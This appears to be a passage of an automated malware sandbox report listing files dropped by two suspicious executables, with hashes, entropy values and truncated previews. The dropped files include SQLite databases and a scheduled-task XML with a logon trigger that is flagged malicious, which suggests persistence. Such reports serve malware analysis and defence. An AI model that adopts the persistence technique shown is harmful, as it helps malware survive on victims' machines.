                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:XML 1.0 document, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1595
                                                        Entropy (8bit):5.098188099867554
                                                        Encrypted:false
                                                        SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL0xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTwv
                                                        MD5:4700BC65C015B33E95795A2C680A45A0
                                                        SHA1:EC1119C04CDC067D631E546B7EF967898F2220FD
                                                        SHA-256:257BBDE300ABF787E0519345C28AB5DC99DBA0E2988F22D8D724EB51888FEAFF
                                                        SHA-512:E322A63621A4BF0A137EE2685663E7EDF8B81D74B9E96495F608031F03E1E3CF0036B0D755C24DCE39FC98D8736128E157B999BD7A8E8A06CFBD3BB9A9D47C79
                                                        Malicious:true
                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.8553638852307782
                                                        Encrypted:false
                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:XML 1.0 document, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1595
                                                        Entropy (8bit):5.098188099867554
                                                        Encrypted:false
                                                        SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL0xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTwv
                                                        MD5:4700BC65C015B33E95795A2C680A45A0
                                                        SHA1:EC1119C04CDC067D631E546B7EF967898F2220FD
                                                        SHA-256:257BBDE300ABF787E0519345C28AB5DC99DBA0E2988F22D8D724EB51888FEAFF
                                                        SHA-512:E322A63621A4BF0A137EE2685663E7EDF8B81D74B9E96495F608031F03E1E3CF0036B0D755C24DCE39FC98D8736128E157B999BD7A8E8A06CFBD3BB9A9D47C79
                                                        Malicious:false
                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):98304
                                                        Entropy (8bit):0.08235737944063153
                                                        Encrypted:false
                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.8553638852307782
                                                        Encrypted:false
                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                        Malicious:false
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
